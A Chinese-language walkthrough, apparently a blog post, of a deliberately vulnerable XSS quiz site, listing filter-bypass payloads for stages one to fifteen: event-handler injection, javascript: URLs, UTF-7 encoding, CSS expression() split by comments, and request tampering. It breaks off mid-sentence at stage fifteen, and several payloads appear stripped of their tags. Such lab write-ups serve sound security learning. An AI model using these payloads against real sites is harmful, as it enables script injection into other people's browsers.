做了一个XSS的闯关游戏,攻略贴上来
游戏地址: http://xss-quiz.int21h.jp第一关:比较简单,直接输入
http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9
第二关:也相对简单,闭合标签
http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb208fa757ee5cdae22f6818cd1
">
第三关:http://xss-quiz.int21h.jp/stage-3.php?sid=9b217ccdc6e28f1a018d6df366553a6152bc65f5
客户端会把输入点的特殊符号给过滤掉,这个地方开始的时候难住了,没想到怎么绕过去
后来查了下,说有用tamper data工具,拦截提交请求,所以也尝试一下
(思考点,原输入点被过滤,看附近是否还有其他注入点科绕过,比如这题,可以对select部分进行绕过
因为这个地方客户端应该不会过滤)
用tamper data 拦截search请求,然后修改p2值为
Japan
成功。这个地方也不确定,有人这么做,
第四关:
http://xss-quiz.int21h.jp/stage_4.php?sid=293c09bc53b81045a43ac5a79ac535daacbeae87
直接输入,肯定是不对的,这个输入点也是被过滤的,要绕过客户端的这种符号的过滤,跟第三个类似
点击输入框,查看元素,发现还有一个隐藏的框,直接在查看元素的修改invisible:hideen为text
这样在这个框内输入注入串:text,
然后输入:hackme">
第五关:
http://xss-quiz.int21h.jp/stage--5.php?sid=40b33710efa4a848d21b5a6dd47671e82c31d853
字符串截断+标签闭合
这种形式的是客户端限制的,我们还是通过抓请求包,修改请求包的方式进行绕过
用tamper data拦截请求,并且注意input标签属性的闭合
”>;
第六关:
http://xss-quiz.int21h.jp/stage-no6.php?sid=236f8f125f43d1efffd8f96d6f8f5b590d880847
input标签对<>进行了过滤,给的提示也是event handle attributes
这里我们就在input标签里进行添加事件
" οnmοuseοver="alert(document.domain);
第七关:
http://xss-quiz.int21h.jp/stage07.php?sid=6fbeba7fd57ce51cf3bb463c8cae1da350722b2e
这个也是input标签,类似上一个,但是你会发现,同时还过滤掉了“,也就是带着引号是不好使得
如果这个1
如果直接这么用是可以绕过的,
οnmοusemοve=alert(document.domain)
服务器端可能会对这种=两边的引号自己会添加
第八关:
http://xss-quiz.int21h.jp/stage008.php?sid=b3d0fe99bca156329272fa022f49c556e0a30d80
这个地方是填入,伪协议
javascript:alert(document.domain)
第九关:
http://xss-quiz.int21h.jp/stage_09.php?sid=aac40201929779e17453875d9d1ebf4ce706f56f
Hint: UTF-7 XSS
搜索下:utf7 xss ,这里有个文章http://lcx.cc/?i=2862
这篇文章有(UTF-7编码解码工具)
这种形式已经出现好几年前了
可以通过
<1> 可以通过设置 @charset=utf-7 设定为 utf-7编码
<2> 可以通过在正文开头设置 utf-7 bom 设定为 utf-7编码
然后浏览器在解析时候,会按照utf-7的格式进行解析
p1=1%2bACI- οnmοuseοver=%2bACI-alert(document.domain)%2bADsAIg- x=%2bACI-&charset=utf-7 //现在只有IE支持utf-7所以IE下通过
别人是这么说的,可是没有实验成功
第十关
http://xss-quiz.int21h.jp/stage00010.php?sid=ebbdd5208bce92c3c26c5da4e79c3a0086f16d5e
这个地方会过滤掉domain
因此采用
">
因为客户端会自动过滤掉domain,这样dom(domain)ain变为domain
第十一关
http://xss-quiz.int21h.jp/stage11th.php?sid=2ea843cedd78f5b9dfd684cc00be42481f72449c
这一关,s/script/xscript/ig;" and "s/on[a-z]+=/onxxx=/ig;" and "s/style=/stxxx=/ig;
对关键字符串进行了过滤,所以只能想办法不利用这些串绕过
">xss <"
这个在IE8下可以用,在IE6,firefox下都没有实验成功
别人写的">
确实可以弹,但是没有给下一关的提示
第十二关
http://xss-quiz.int21h.jp/stage_no012.php?sid=b6b9666eca49506330251b9c3e9b0603081e7cae
过滤掉 "s/[\x00-\x20\<\>\"\']//g;"
可以用下面方式闭合,在IE8下有效,(``只有IE能解析)
`` οnmοusemοve=alert(document.domain)
第十三关
http://xss-quiz.int21h.jp/stage13_0.php?sid=9eb9941d92e5506584eb05f5f9ce3d39dfec842f
样式表绕过
xss:expression(οnmοusemοve=function(){alert(document.domain)})
(为什么这么写,http://vod.sjtu.edu.cn/help/Article_Show.asp?ArticleID=2224,说CSS样式的定义应该写进函数里,不然会报错)
background-color:#f00;background:url("javascript:alert(document.domain);"); 这种方式没有成功
第十四关
http://xss-quiz.int21h.jp/stage-_-14.php?sid=465715a8505be6ba6ddc5d51ef81345c22c97aa0
关键串的替换: s/(url|script|eval|expression)/xxx/ig;
xss:expre/*hgh*/ssion(οnmοusemοve=function(){alert(document.domain)})
下面这个比较好
cos:expres/**/sion(if(!window.x){alert(document.domain);window.x=1;})
第十五关
http://xss-quiz.int21h.jp/stage__15.php?sid=f530a129f54ea7c80420c9c8cd5ea68f3ea139c6
这个是document.write()
实验可知道这个会过滤掉<>
由于ducumen.write写的时候,
script自解码机制,参考 HTML与JavaScript自解码机制 http://book.51cto.com/art/201301/378154.htm
HTML:进制编码:&#xH;(十六进制格式)、&#D;(十进制格式),最后的分号(;)可以不要。
HTML实体编码:即上面的那个HtmlEncode。<> <,>
onclick里的这段JavaScript出现在HTML标签内,意味着这里的JavaScript可以进行HTML形式的编码
如果用户输入出现在